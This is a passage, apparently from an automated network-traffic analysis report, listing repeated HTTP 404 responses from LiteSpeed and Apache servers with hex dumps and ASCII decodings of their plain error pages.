3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:17:57 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:18:00 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:18:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:21 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:21 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:24 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:26 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 